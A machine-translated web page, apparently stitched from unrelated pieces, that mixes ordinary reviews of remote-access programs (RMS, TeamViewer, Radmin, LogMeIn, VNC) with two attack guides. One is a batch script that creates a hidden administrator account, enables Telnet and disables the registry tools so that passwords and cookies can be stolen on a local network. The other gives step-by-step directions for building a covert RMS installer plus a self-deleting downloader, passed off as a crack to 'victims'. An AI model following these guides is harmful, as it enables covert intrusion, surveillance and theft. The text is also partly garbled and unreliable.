Invisible remote access to a computer via the Internet. Convenient online software store for Windows

Hello everyone, this is my first article on Habré, so don't judge strictly. In this post I will describe how you can get remote access to a user's computer on your local network via the command line, bypassing all antiviruses and knowing a little Windows command line syntax. The article is intended for use only on Windows XP, but if you wish, you can rewrite the code for any other OS of the Windows family. So let's get started. Overall, this article is written for entry-level users. The most important goal is to get the necessary data (passwords, attendances, summer cottages, access to mailboxes, webmoney key files, cookies and other important dandruff) and leave unnoticed without leaving any traces of penetration. So, let's start, I am on a local network with about 5000 users, a network with static or dhcp does not matter, I have an ip address and I am happy. The network has a ton of subnets, the routes of which are registered on the server. The MAC address of the computer is registered with the network administrator, since in my case, it was a condition for connecting to the grid, so my poppy will light up if something happens. To avoid being found, first of all, we install the virtual machine (I used VmWare 5.1), install XP on it, a port scanner (I used SuperScan 3.00 You can download it) and start the Telnet service. We connect the virtual machine to the network using NAT and thus get a completely different mac-address of the machine looking into the network. We installed all the buzzing virtual machine, let's move on. We open a regular notebook and write a batch file with the following content:

@Echo off
Net user Admin_Support lop / add> nul
Net localgroup net localgroup Ђ¤¬Ёёбва в®al Admin_support / add> nul
Net accounts / maxpwage: unlimited> nul sc config TlntSvr start = auto> nul
Sc start TlntSvr> nul
Reg add "HKLM \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList" / v Admin_support / t REG_DWORD / d 0> null
Reg add "HKCU \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ policies \ System" / v DisableRegistryTools / t Reg_dword / d 1 / f> nul Reg add "HKCU \ SOFTWARE \ POLICIES \ Microsoft \ MMC" / v RestrictPemitSnapins / t Reg_dword / d 1 / f> nul del% SestemRoot% \ system32 \ compmgmt.msc> nul
del Start_game.bat

Tags: viruses, hacking, security, information security

RMS Is a product that provides fast and secure remote access to the desktop of a remote computer. The remote computer can be located in the living room of your home or on another mainland. The most commonly used connection mode is Remote Control or View. This mode allows you to see the remote desktop and control the keyboard and mouse of the remote PC. Thanks to its unique capture technology, RMS is one of the fastest remote desktop products to work in real time.

In the center at the top of the window with a remote screen is a pop-up toolbar that contains a number of frequently used actions: setting up a connection, calling another mode, selecting the current monitor, etc. This mode supports "Drag & Drop" technology - dragging files and folders directly to the remote desktop and vice versa. You don't need to start the file manager to perform a simple file operation. Use the familiar drag and drop.

File transfer

RMS provides a highly advanced file manager that allows you to access the file system of a remote computer. The "File Manager" mode is designed as a window divided into two panels vertically, the interface will be familiar to users of other well-known file managers.


Following are some of the features of the RMS File Transfer Module:

  • Support for all basic file operations - copy, move, delete, etc.
  • Built-in "smart resume" of files. This feature is always enabled when replacing (overwriting) files. During the file replacement operation, only the parts that do not match will be directly "physically" replaced.
  • The tab mode allows you to open several connections with different PCs in one window of the file manager. File operations are possible between remote computers, not just between local and remote. The tabs are easy to arrange by dragging and dropping.
  • All data, during transmission, is compressed and encrypted to save network traffic.
  • The file manager fully supports Drag & Drop integration with other applications and the system.

List of computers and network structure

If you are using RMS to access hundreds (or even thousands) of workstations, hierarchical grouping of connections is the most convenient way to organize. You can create a structure containing, for example, a list of cities in which there are divisions in your organization. In turn, for each city, you can create a directory containing a list of divisions located in this city. The structure can be as complex or simple as you like. If the Viewer is located inside a domain (or a domain is explicitly connected to it), the entire Active Directory tree is available, i.e. structure and connections do not need to be created manually.


Another interesting feature is the so-called. "Sketches of screens" of remote computers. All authorized connections (remote PCs) display a thumbnail image of their desktops, which are refreshed at a specified interval. You can change the size and refresh rate of these thumbnails. Also, if you hover over such a sketch and hold it for a few seconds, a pop-up window with an enlarged copy of this sketch will appear.

Accompanied and unaccompanied PCs

An escorted computer is a PC that an operator is working on. For example, the computer of an accountant, designer, manager. An unaccompanied computer is a PC with no operator behind it. Typically, these are various kinds of servers - web server, file server, domain controller, etc. RMS is well suited for administering managed and unattended PCs. By default, RMS Host provides full control over the remote computer. You can control the screen, keyboard, mouse, files, processes, services, power, and more without any restrictions. You can even restart your computer in Safe Mode. Host settings can be password protected from changes. This is all convenient for administering unattended PCs. However, if a live user works at the computer, this approach is not always suitable. The user may not be satisfied with the fact that it is possible to connect to his PC at any time without warning. In this case, the Host can be configured in such a way that, when attempting to authorize a remote administrator, access permission is requested from the user who is working at the computer. You can also limit the list of connection modes. For example, deny access to the file system. There is a special module for administering users outside the organization or providing remote support - Agent. This is a special version of the Host that can be run without installation and administrator rights. The remote user can end the session at any time by simply closing the program. When this function is enabled, the program shows the remote user a message requesting access to this remote PC. The remote user can accept or reject the connection request. In the settings, you can specify the period of time after which the request will be automatically rejected or accepted, you can also prohibit the display of the request if the interactive user is not working at the time of connection with the remote PC.


This function is convenient for various support services. An unfamiliar client may feel uncomfortable knowing that someone can connect to his computer without asking.

Dealing with complex network topologies

RMS is a highly flexible remote administration utility that can operate on a wide variety of networks with complex topologies and structures. Inside a corporate or local network, everything is usually simple. In the connection settings, the IP address or DNS name of the desired PC is indicated and ready - you can connect. But what if the remote computer is hidden behind a firewall or NAT? Our Internet-ID technology comes to the rescue. On a remote Host, you can, literally with two clicks of the mouse, get a unique ID, which will then be permanently linked to this Host. Then specify this ID in the connection settings on the administrator's side. That's all - you can work. It is not much more complicated than connecting by IP address, but it allows you to easily solve many routine problems of system administration, and do without "port forwarding" and other techniques. Also available so-called. "Cascade" connection (connection through another Host) and reverse connection (older and less convenient version of Internet-ID). These connection modes will be of interest to advanced networking specialists.

Flexible configuration of access rights

RMS provides the ability to differentiate the rights of remote access to a remote computer by mode and user.

In addition to the built-in RMS account system, a system of differentiation of rights for Windows users is also supported, with NTLM-based authorization. This is especially useful on domain networks.

The function of blocking input devices (keyboard, mouse) is a must for any modern software for remote access. This feature allows you to lock the keyboard and mouse on the remote computer so that the remote user does not interfere with the support technician's work with the remote computer.


The screen lock function allows you to hide the screen of a remote computer from the user, which is located directly at his monitor. Optionally, you can select an image, lettering or web page to be displayed on the remote monitor for the duration of the lock. You can configure the locking of input devices and the screen, both before establishing a connection, and while working with Remote Desktop.

Working with multiple computers at the same time

RMS supports an unlimited number of concurrent desktop connections on remote computers.
  • The Client (Viewer) can work with several remote Hosts at the same time (a convenient “tabbed” interface makes this task easier).
  • The Host can accept connections from several Clients at the same time. For example, multiple administrators can connect to the same Host.
  • All connection modes support simultaneous connection.

Picture Quality Adjustment and Eco Mode

When working within a local or fast network, these settings do not need to be changed - the program will work in real time. However, if the connection channel is narrow, then it makes sense to reduce the number of colors transmitted over the network of the picture, and also to include the so-called. "Economy mode". On a slow network, it is recommended to select 256 bit color and enable Eco mode. You can also limit the FPS. This will make it very comfortable to carry out remote access even via GPRS. This function allows you to print documents from a remote computer to a local printer. If earlier for this it was necessary to copy the document itself to the local computer, then open it in an application that supports this type of document, and only then print it, now everything is much easier.


There is no longer any need to install the required application on the local computer and copy files (especially since this is far from always possible). You can print the document remotely on a special RMS virtual printer. The data will be automatically transferred to the local computer (Viewer) and you can print it on any available printer.

November 27, 2014 at 03:31 PM

Free software for remote control of computers

  • Server administration,
  • Network technologies ,
  • System administration

Remote computer control programs allow you to remotely control another computer over the Internet or on a local network. This is convenient when you need to help an inexperienced user, for example, a relative or friend who is poorly versed in a computer to do something on it, without leaving your comfortable chair and without wasting your nerves and time on telephone conversations. Such programs are also convenient to use for remote work, for example, from home to connect to the office and vice versa - to access your home PC, for system administration of a whole fleet of computers and servers.

Let's conduct a comparative analysis of remote control programs, highlight their advantages and disadvantages.

TeamViewer

One of the most popular programs for remote access, it can be quickly downloaded and installed or immediately launched without installation, even a not very experienced user can handle it. When launched, the program displays a window with an ID and password for accessing this computer, and TeamViewer also allows you to connect to another computer by specifying its ID and password.

Advantages:
The program has several basic modes of operation: remote control, file transfer, chat, demonstration of your desktop. The program allows you to configure round-the-clock access to the computer, which will be convenient for system administration. The speed of work is quite decent, there are versions for all mobile platforms, for various operating systems, which is very pleasing. A simple and straightforward interface, plus a number of additional utilities to expand the functionality of the program, will be useful for remote support services.

Flaws:
Although the program is free, but only for non-commercial use, and when working with it for more than 5 minutes, a number of difficulties arise, for example, TV can block a remote connection session, recognizing it as commercial use. For round-the-clock remote access or administration of several computers, a computer network, you will have to pay for additional program modules. The cost of the program is high.

Outcome:
This program is ideal for a one-time remote connection or using it for short periods of time. It is convenient to use from mobile platforms, but not to administer a large number of computers. You will have to pay extra for additional modules.

LiteManager

A simple, but quite powerful program in terms of capabilities, consists of two parts, the first is Server, which must be installed or run on a remote computer and Viewer, which allows you to control another computer. To work, the program requires a little more skills and experience from the manager, although working as a server is even easier than in TeamViewer, the server can be installed once and no more action is needed from the user, the ID will always be constant, you can even set it yourself manually, which very easy to remember. LiteManager Free version is free for personal and commercial use.

Advantages:
In addition to the main modes of remote access: remote control, file transfer, chat, task manager, registry editor, the program also has unique functions, for example: inventory, screen recording, remote installation. The program is free for use on 30 computers, it can be used for round-the-clock access without any additional modules. There are no restrictions on the working time. It is possible to set up your own server ID to set up corporate support. The program does not have any restrictions on the time of work and locks.

Flaws:
There is not enough client for mobile platforms or other systems, there are restrictions on 30 computers in the free version, to administer more you need to purchase a license. Some specific operating modes are available only in the Pro version.

Outcome:
Litemanager is suitable for providing remote support, for administering several dozen computers absolutely free of charge, for setting up your own remote support service. The cost of the program is the lowest in its segment and the license is not limited in time.

Ammy admin

The program is basically similar to TeamViewer, but with a simpler version. There are only basic modes of operation - viewing and control, file transfer, chat. The program can work without installation, free for non-commercial use.

Advantages:
A simple and lightweight program, you can work both on the Internet and in a local network, has minimal settings and does not require any special skills. Compared to TeamViewer, the licensing policy is milder.

Flaws:
A minimum of functions for remote control, it will be difficult to administer a large park of computers, with long-term use, more than 15 hours a month, the session may be limited or blocked, paid for commercial use,

Outcome:
This program is more suitable for a one-time connection to a computer and not very complex manipulations, for example, as an aid to an inexperienced user in setting up a computer.

RAdmin

One of the first remote control programs and known in its circle, I could not help but mention it, more intended for system administration, the main focus is on security. The program consists of two: a server component and a client component. It requires installation, it will not be easy for an inexperienced user to figure it out, the program is designed mainly to work by IP address, which is not very convenient for providing those. online support. The program is paid, but has a free trial period.

Advantages:
The program has a high speed of work, especially on a good network, thanks to the desktop capture video driver, increased reliability and security. Intel AMT technology is built in, which allows you to connect to the BIOS of a remote computer and configure it. Only the main modes of operation are implemented: remote control, file transfer, chat, etc.

Flaws:
There is almost no way to work without an IP address, i.e. connect by ID. There is no client for mobile systems. There is no free version, only a trial period of 30 days. Experienced user skills are required to operate the program. When connecting a video, the driver can disable the Aero graphic shell, sometimes the screen flickers.

Outcome:
The program is more suitable for system administrators to administer computers and servers in a local network. To work over the Internet, you may need to set up a VPN tunnel.

Good day everyone!

Today we will be doing a hidden assembly of the Remote Manipulator System (analogue of Radmin, Teamviewer)
I warn you right away that it is quite difficult to assemble, especially for beginners.

I will try to explain everything step by step and in an accessible language.
RMS (like Radmin, TeamViewer, etc.) performs the same function - remote administration (i.e. control) of the computer

What can RMS do?
All of its functions are listed here:
-Management and supervision
-File manager
-Text chat
-Task Manager
-Connection via Internet-ID! (same as TeamViewer)
-Device Manager
-Connecting to the command line
-Record screen on schedule
-Simple text message
-Support for multiple monitors
-Remote installation
-Wake-On-Lan
-Remote registry.
-Function "Run"
-Connection to a web-camera.
-Self removal
-Integration with firewall

I'll start by listing what an assembly is:
1. Completely hidden installation (the screen does not blink, unlike Radmin)
2. After launch, the installer will remove itself
3. All assembly files are hidden / systemic, it will be more difficult for the victim to notice something
4. An IP is additionally sent to your mail, but we will not need it, most likely, since we will use the Internet-ID
5. The weight will be ~ 2.8mb
6. This assembly is partially fired by antiviruses (how to do so that it does not fire - write to contacts)

So, let's start collecting:

I. Setting up the RMS server

First of all, download the archive
Attention! The archive has a password

Archive password:
-
Open the R folder, run the server.exe file, install. After the installation is complete, the program will start itself:

A Security window appears in front of us:

Click Change / Set - enter the password, let's say 12345678rms
Go to the Authentication tab, there should be a checkmark - Level 3
Next, click OK! Everything, the window disappears.

The next step for us will be setting up the server
In the lower right corner, right-click on the blue icon
Setting up Internet-ID connection
Click Get new ID, something similar appears:

The next step for us will be the second part of the server setup:
open Start, Programs, Remote Manipulator System - Server, Settings for R-Server

There will be two steps, the first one we have already passed ("safety").
2. Startup Mode - Automatic
3. Settings, uncheck all the checkboxes, put only on "disable closing RMS", also in the Logging tab, the checkbox should be unchecked.
4. License Key - Enter this one:
-

5. Close the Settings

Open the directory where the server was installed and select the following files:

Copy, create a folder somewhere, paste everything there.
It is in this folder that all the most interesting will happen for us, hereinafter I will call this folder "New Folder"

We continue to work. Now we need to export our settings with passwords and all settings.

To do this, we need to do the following:

For XP, WIN + R: regedit
For 7, just in the line "find programs and files" enter regedit, and Ok
Go here: HKEY_LOCAL_MACHINE / SYSTEM / then export the Remote Manipulator System

And we indicate the path of our created folder (set the file name - sets) into which we copied our server files, this is what you should get:

The sets.reg file itself is a settings file, all your settings are stored there, if you want to change something, you only need to replace this file by doing all the previous steps.

II. Editing an Installer

Well, let's move on to the main part.

Select install.bat, right-click to change
(the first half of the code serves to remove the previously installed Radmin, Rem_Cam, and if it was installed earlier on the victim's computer, then RMS, we don't need someone else to have access to the computer except for us).

There are two simple steps:
1. Create mail on Yandex (!):
2. Please, do not be stupid here, so that there are no questions later!
We find it almost at the very end and edit this for ourselves:

### LOGIN ### - this is ONLY a login, WITHOUT adding @ yandex.ru, ### PASSWORD ### - 12345678, here we clearly indicate our data from registration in Yandex.
Close, save.

Select the setup.exe file in the New Folder, right-click to open the archive.
Select everything that is in the New Folder (except for setup.exe, of course) and drag it into the window that opens. We've successfully added files to the archive.

As a result, you should get this:

Copy our setup.exe file somewhere.
You can delete everything else from the folder.

III. Completion

So, open the R folder, install the Viewer.exe file, through it we will connect to the "victim" using the Internet-ID.

Important!
If you are going to throw your assembly to several "victims" at once, then there will be problems with the Internet ID, since it is assigned to one assembly for one computer.
If you are going to distribute hidden rms in large quantities, then in this case you need to connect to each "victim" by IP

As I personally advise you to use this assembly.
You throw it to any one victim, it sets it up. Then you can connect using the Internet-ID (which you copied above). Have done everything you need on the victim's computer and then delete the assembly from the victim's computer
For this you need:
Connect to the victim and select the "Launch programs" connection - Browse - from the victim, go to the windows \ system32 directory there, find the de.exe file, select. (Check the "hidden launch" checkbox)

The de.exe file is included in the assembly. This is a self-deleting file that completely removes your hidden rms assembly from the victim's computer.

After running this file from the victim, it is better to check whether the assembly has been deleted (for this we just try to connect again), if we cannot, this means the assembly was successfully deleted and we can use our assembly on another victim in the same way as on the first one.
This is done to avoid conflicts between two computers with the same Internet-ID.

The big advantage of this assembly will be that the connection will be one hundred percent! Even if the victim has a dynamic IP (or behind NAT).

Also, this assembly is integrated with the firewall. In the settings, you can enable traffic saving, in this case everything will work faster and eat less traffic.
I was also pleased with the built-in scanner for RMS servers. If you suddenly lost your victim with a dynamic IP, you can easily find it by scanning the IP range in which it is located (for example 92.72.0.0-92.72.255.255)

In general - try, write reviews, throw THANKS

Optionally, create a downloader

What exactly is this downloader and what is it for?
This is an.exe file, which immediately after startup, self-deletes, downloads the file and installs, after startup, it removes itself without leaving any traces.

So, let's begin!

Everything you need is in the Downloader folder

So, we need to register a server on Yandex.
You should already have mail on Yandex, where the IP comes. From this account we will register our server, where we will upload our assembly.

For this:
1. Log in to your Yandex account
2. Follow the link http: //narоd.yаndеx.ru/
3. Click "Create site" (we don't need a site, only a file manager)
4. When our site is created, go to the file manager, ****. Narod2.yandex.ru/filemanager/
5. Select "Upload file", load our RMS assembly
6. After the file is loaded, there should be such a gray button "link", click, copy.

Let's say we already have a server on Yandex where our file is located. Ok, let's move on.
Next, unpack our downloaded archive, open the link folder, and change the winupd.bat file.
### LINK ### - address to file
### DOWNLOADED "FILENAME ### - file name

Batch file: open our batch file - winupd.bat
Save us: leave it as it is
We put the rest as in the picture, it should look like this:
Options tab:

In the Include tab, add the wget.exe file
Include tab:

The next step for us is to put the winupd.exe file in a shell, which will drop it and then self-delete.
Click on the load.exe file, open the archive, drag the winupd.exe file into the load.exe file

Everything! Our downloader is ready!

For non-falsity and convenience, you can sell our file to someone under the guise of a crack, patch, image, etc. (I’ll say right away, it’s impossible to create an installer with the extension .jpg, .mp3, except that before that, having rummaged in the victim's registry, well, this is nonsense, better use SI)

Express RMS changes:

Simplified setup (enter your login and password in the textbook)
- After reboot, resends the IP
- There are now only 6 files in the installer:
- Installation is much faster

Please do not contact me in a personal with a request to give a key on which restrictions, for all questions, as well as for new versions of assemblies, write to me on the contacts (below)

tags: hidden rms 5.5 5.4, hidden rms remote administration, hidden rms with sending ID and password to mail, remote manipulator system 5.5, hidden administration, remote administration, remote manipulator system, hidden rms, hidden computer control, rms remote access, remote access, hidden web camera view, hidden web camera

There are a lot of programs for organizing remote access. There are paid and free programs, there are programs for different operating systems. It is clear that in this article we will not be able to consider everything at once, but we will talk about the most interesting of them, and most importantly, we will understand what is more effective for a particular task.

Radmin (shareware)

About ten years ago, the most popular remote access program was Radmin, and it still exists (www.radmin.ru) - it has not gone anywhere during this time. Let's start our review with it.

The program consists of two parts: Server and Viewer. The first one runs on a remote computer (or remote computers), and the second one runs on your computer and is used to connect to the remote machines that you are about to configure. On the developer's site, you can download both the complete kit and individual components. There is also a portable version of the Viewer that works without installation, and the Radmin Server 3.5 NTI version is a special version without an icon in the tray, that is, the user of the remote computer will not know that Radmin is installed on it until you start controlling his computer.


I will note the key features: support for Windows 8 32/64 bit, support for switching user sessions in Windows XP / Vista / 7/8, compatibility with Wine (Radmin can organize remote access to a Linux PC via Wine), Telnet support, remote shutdown of the PC , a Radmin server scanner (allows you to find all the PCs you can manage on your network), file transfer between Server and Viewer.

Conclusions:

  • The functionality of the program: here and its own authentication, and support for voice chat, and the ability to transfer files. Everything is very convenient.
  • Due to the fact that Server is installed on the remote computer, the presence of the user is not required, as in other similar programs. For example, you can administer remote PCs of your colleagues when they are gone for lunch. In other similar programs, it is necessary either for the user to allow the connection, or for the user to provide you with a password that is generated automatically for each communication session.
  • Low system requirements, the program does not load the processor at all, which is especially important for my old laptop with AMD process, which heats up like an iron - it acted as a "remote" computer.
  • Just starting Server is not enough, you also need to configure it.
  • Many users love TeamViewer not for its functionality, but for the fact that it does not require any special ports (it uses port 80 by default) and does not require a firewall to be configured. Radmin Server uses port 4899 and cannot be started without configuring a firewall.
  • No mobile clients.
  • Doesn't support other OS.

TeamViewer (freeware)

Now, probably, of the programs for remote access, TeamViewer is the most popular. You can download its full version from www.teamviewer.com/ru without paying a dime. The program is absolutely free for non-commercial use.


Rice. 4. TeamViewer started

TeamViewer is pleased with the support for Windows, OS X, Linux, which Radmin lacked so much. There are also mobile clients for Android, iPad / iPhone: you can control a remote computer from your iPhone. There is also a Portable version of the program for Windows, which is very useful for infrequent use of the program, and the Portable version can be run both on the "server" and on the "client", unlike Radmin, where you can run only the client (Viewer) without installation, and the "server" part must be installed.

After starting the program, you will see the main TeamViewer window and the Computers & Contacts window (Fig. 4). If you plan to help all your relatives and colleagues at once, you can click the "Register" button, create an account, and then in this window you will see all the numerous computers that you have configured.

Rice. 5. TeamViewer in action

Now let's figure out which is which. If you need to connect to your computer, then you must tell the remote side your ID (in this case 969 930 547) and password (8229). How to inform, already decide for yourself - you can copy and transfer these values ​​via Skype, ICQ, e-mail, SMS, or simply dictate by phone. This password is changed every time the program is started. If the program is installed on your computer, you can make a permanent personal password, but I do not recommend: the password can be compromised and then anyone can connect to your computer.

If you need to connect to a remote computer, then you need to enter the ID of the remote side (in this case 411108007) and click the "Connect to partner" button, after which the program will ask you to enter the password that you received from the remote side. That's all - in the window that appears, you can configure the remote computer (Fig. 5).

You've probably already noticed the main difference from Radmin: you need to transfer the password to the person who sets up the computer, and in Radmin the password is specified when creating a user account. In other words, you need the presence of the user at the computer. The question is, how can you organize a home office when you want to access your work computer from home, for example, at night. Everything is very simple. You need to organize the autostart of TeamViewer (for example, add it to the "Startup" group or register it in the registry in the Run key) and set the "Personal password". Please note that you cannot set a personal password if the program is not installed on your computer, but launched without installation.

There is another program you should know about: TeamViewer Host. It runs as a system service and is used for round-the-clock access to a remote computer, including logging in and out of the system. It turns out that TeamViewer Host allows you to organize a terminal server, and it supports an unlimited number of clients for one server (the number of clients is limited only by the computing capabilities of your computer). It should also be noted that installing TeamViewer Host requires administrator rights, which are not always available, so in most cases you will still use regular TeamViewer. However, if you only need to configure one computer (or just organize remote access to it, say from home), then TeamViewer Host is not needed. For the sake of fairness, it should be noted that if a regular TeamViewer (not Host) is running on computer A, then computers B, C, D (the number three is given as an example) can connect to it for joint administration. Another thing is that it is necessary to coordinate the actions of administrators, since the keyboard and mouse are common, but one can configure, the rest will observe.

Like Radmin, TeamViewer allows you to exchange files, voice and text messages, as well as reboot the computer remotely (the required command is in the Actions menu, see Fig. 5, just restarting the computer is not enough - then the TeamViewer communication session will not be established, restart the computer during its configuration is needed only through the "Actions" menu).

Conclusions:

  • Simplicity (the program is simpler than Radmin - a huge advantage for untrained users who have to install it on a remote side).
  • The program does not require installation at all: both on the client and on the server. Installation is optional.
  • Works through port 80 (and some additional ports), so no firewall configuration is required.
  • Availability of versions for other OS.
  • Availability of mobile clients for Android, iOS and Windows Phone 8 (that is, you can control a remote computer directly from your iPad).
  • Possibility of organizing interactive conferences (up to 25 participants).
  • Doesn't require administrator rights for remote access.
  • The processor loads much more than Radmin, my old laptop even overheated and turned off.
  • Although there are mobile clients, they are not very convenient (however, it is better than nothing).

Royal TS (shareware)

Once there was such a program - mRemote. I don't know what happened there, but the mRemote project was closed, and the developers took and created another project - Royal TS. On the site you will find versions for Windows, OS X and iOS (can be run from iPhone and iPad).

In Royal TS, before creating a connection, you need to create a document, that is, one connection = one document. Royal TS documents are a very convenient thing, they can be transferred as ordinary files, for example, to another admin. He will be able to open such a document and immediately connect to a remote computer without the need to create a connection manually. The shareware version has a limit on the number of simultaneously open documents - ten. As for me, this is quite enough for non-commercial use of the program, so in practice you will not even notice that you are missing something (unless, of course, you are remotely administering a huge network of computers).

First of all, I must say that this program is fundamentally different from Radmin and TeamViewer. Both of these programs combine the functionality of both a server and a client (in the case of Radmin, the server and the client are different programs, in the case of TeamViewer, they are the same program). In other words, on one of the computers you can install Radmin Server or TeamViewer, and on the other you can use Radmin Viewer or TeamViewer, respectively, to connect to this remote computer. So, Royal TS is something like Radmin Viewer, that is, a program for connecting to a remote server, but you have to create a server on your own. How you do it is your problem. Royal TS will not help you create such a server, it will only let you connect to it.

Rice. 6. Royal TS for Windows

Among the protocols for connecting to a remote server that Royal TS supports: RDP, Telnet, SSH, Citrix, VNC. The RDP / Telnet / SSH and others servers themselves will have to be configured on their own.

On the one hand, this is beyond the scope of the article, on the other, it would be incomplete if I did not give an example of setting up at least one of the servers that Royal TS supports. SSH / Telnet servers, I think, will not be very interesting to the reader. I want something graphic. Suppose we have Linux (Ubuntu or its clone) and need to set up a VNC server. To do this, first install the VNC server with the command:

Sudo apt-get install vnc4server

After that, you need to run it - for the first time without parameters:

Sudo vnc4server

When running the sudo vnc4server command, you need to enter a password that will be used to connect to this VNC server. The password itself will be saved in $ HOME / .vnc / passwd. I won't say another word - there is man :). After the first start, you need to start vnc4server, specifying the screen number:

Sudo vnc4server: 3

Next, in Royal TS, you need to create a new document (on the File tab), then go to the Edit tab and click the VNC button. In the window that appears (Fig. 7), you need to enter the Display Name - in our case: 3, the IP address of the VNC server and specify the port number (usually 5900). The password will be asked when connecting to the server.

Rice. 7. VNC connection parameters

Conclusions:

  • A universal client for connecting to a remote server using various protocols.
  • There are versions for Windows, OS X and iOS.
  • It is impossible to organize remote access only by means of Royal TS, additional programs are needed.
  • Not suitable for remote configuration of computers of inexperienced users - they simply will not be able to configure the necessary remote access services.

Supremo: free and simple (freeware)

Let's analyze the situation. If you do not like TeamViewer or you cannot use it for some reason (including the need to purchase a license for commercial use), and Radmin is also not suitable for some reason, then you will have to look for analogues. Since the article deals with simple and free programs, the following program must be: a) free; b) simple. Such is the program Supremo, which can be downloaded from the site.

The program (fig. 8) is created "after the image and likeness" of TeamViewer. It does not require installation, its principle of operation is the same as that of TeamViewer, even it uses the same terminology (this is me regarding the partner ID and other labels in the program interface).

The customized computer and the support technician's computer must be running Windows only. Various editions of Windows are supported, including Windows 7 and Windows Server 2008 R2. The official website has not yet said anything about support for Windows 8 and Windows Server 2012.

Rice. 8. Supremo program

The algorithm for using it is simple: you need to run the program on both computers, then ask the remote side for its ID and password, and then click the "Connect" button. Before this, the remote side must press the "Start" button, otherwise the connection will not be allowed. Perhaps this is the only difference from TeamViewer.

To make the overview more complete, let's go to the program settings (Tools -> Options). In the "Security" section (Fig. 9), you can configure the automatic launch of the program, specify a password for remote connections and specify which ID is allowed to connect to your computer.

Rice. 9. Supremo security parameters

In the "Connection" section (Fig. 10), you can specify the parameters of the proxy server, if it is present in your network.

Rice. 10. Supremo connection parameters

In addition to its direct purpose, namely, remote control of a computer, the program can be used to exchange files. To exchange files (which is possible in two directions - both downloading and uploading) just use drag & drop.

Conclusions:

  • Easy to use.
  • No installation required.
  • File transfer capability.
  • Chat capability.
  • No firewall configuration required (HTTPS / SSL is used).
  • No support for OS other than Windows.
  • No mobile clients.

LogMeIn (freeware)

Let's consider another useful program - LogMeIn (fig. 11). The purpose of this program is the same as for all the others discussed in this article - remote access. On the logmein.com site you will find several similar products, but we are primarily interested in the LogMeIn Free product. Its capabilities are sufficient for most purposes: access to a computer running Windows or OS X, remote control and desktop viewing, copying and pasting data between computers, reboot function, chat, multi-monitor support, SSL / TLS intrusion detection, not requires configuring firewall settings, does not require remote computer administrator rights.

Personally, I liked the functions of copying and pasting data between computers, as well as the reboot function: in the process of setting up a computer, it sometimes requires a reboot, after which the remote access session will be automatically restored, which is very convenient.

Unlike the Free version, the Pro version supports transferring files between computers, HD video, dragging and dropping files between computers, and a few other features that are hardly worth paying almost 53 euros a year - that's how much the Pro version costs. A comparison of the two versions, as well as the OS X version, can be read at: https://secure.logmein.com/comparisonchart/comparisonFPP.aspx.

Rice. 11. LogMeIn main window

The way of working with this program is slightly different from TeamViewer and similar programs. Everything is a little more complicated, but, apparently, this is how the LogMeIn developers determine who uses the program and for what purposes. In the main window, select "from Mac or PC" and then you will see the sequence of actions that must be performed to provide another user with access to this computer (Fig. 12). Grandfather and grandmother will definitely get confused and not appreciated. You cannot do without registering at logmein.com, although it is free, but in terms of convenience, it is completely superfluous.


Rice. 12. How to connect to this PC

There is, however, an easier way - anonymous access through a browser. Quite an interesting feature that is not found in other similar programs. The bottom line is this: a user who wants you to configure his computer creates an invitation link, then sends it to you in any convenient way (by email, skype, and so on). An invitation link is valid for a certain time (the time is assigned by a remote user), even if someone spies on the link, he is unlikely to be able to use it after the expiration date.

Let's take a look at how to create an invitation and how to use it. The Desktop Sharing section displays the current prompts. By clicking the "Send invitation" button, you can generate that very link. The New Invitation Wizard lets you define the length of the invitation and how the invitation is sent (you can email the link, or you can just get the link and send it manually).

Rice. 13. Controlling a remote computer through a browser

Then this link must be sent to the person who will configure the computer. When he copies it to the browser and opens it, he will see a screen like the one shown in Fig. 13. To continue, click the "Continue" button. After that, the user who sent the link will receive two consecutive requests. The first request is a request to grant access to the guest, the second request is to grant access rights (Fig. 20). The guest can either fully control the computer, or only view the desktop without control.

Conclusions:

  • Doesn't require administrator rights.
  • No firewall configuration required.
  • The ability to use a browser for remote control.
  • Mobile clients.
  • A somewhat unusual principle of operation.

Mosh (mobile shell): a good alternative for SSH

Mosh can also be used to remotely access the console (that is, you can remotely execute commands and see their result). The main advantage of Mosh over SSH is the possibility of roaming, that is, changing the network on the client machine, which is useful on the road when the network can change (now it is cellular, in a few minutes - Wi-Fi, while the IP changes, but the connection remains). Frequent traveling admins will appreciate this. But there is one big drawback: Mosh will not connect to a regular SSH server, that is, you will have to install Mosh on the server. But Mosh does not work as a daemon, like SSH, but as a regular program, that is, you do not need root access to run it. Mosh is available for many Linux and BSD distributions, OS X, iOS (as part of the popular iSSH client), and Android.

UltraVNC / RealVNC

VNC (Virtual Network Computing) is a system for remote access to a computer desktop using the RFB (Remote FrameBuffer) protocol. Earlier it was shown how to organize a VNC server in Linux, in Windows such a server can be created using the UltraVNC or RealVNC programs. UltraVNC is similar to RealVNC, but has additional features such as encryption of the connection between the client and the server, the Java Viewer module (access to a remote PC through a Java-enabled browser), and others. Although RealVNC has a VNC Viewer plugin for Google Chrome, so there is no need for a Java Viewer. As noted, programs are very similar in many ways, so in this article we will only cover UltraVNC.

When installing UltraVNC, it is possible to install both a VNC server and a VNC client. On your computer, if you do not need remote access to it, you do not need to install the VNC server. When installing a VNC server, it will be possible to configure it to run as a system service, but this requires admin rights. The RFB protocol that VNC uses typically uses ports 5900-5906. Therefore, to connect via VNC, you need to configure a firewall, otherwise it will "chop" the connection.

The UltraVNC Viewer program is used to connect to the VNC server. The program is universal and you can use it to connect to any VNC server, not just the one running UltraVNC Server. Similarly, you can connect to the server created by the UltraVNC Server program with the RoyalTS program or any other VNC client.

A few words about how it all works. First, launch the UltraVNC Edit Settings program and on the Security tab set the password for accessing the VNC server, then you need to launch the UltraVNC Server program. Then on another computer, launch UltraVNC Viewer (Fig. 14) and enter the IP of the computer on which the VNC server is installed, and press the Connect button.

Rice. 14. UltraVNC Viewer

Conclusions:

  • You need admin rights, you need to configure the firewall.
  • The same protocol can be used to control Windows, OS X and Linux, but these are not advantages of a specific program, but of VNC itself.

SSH access

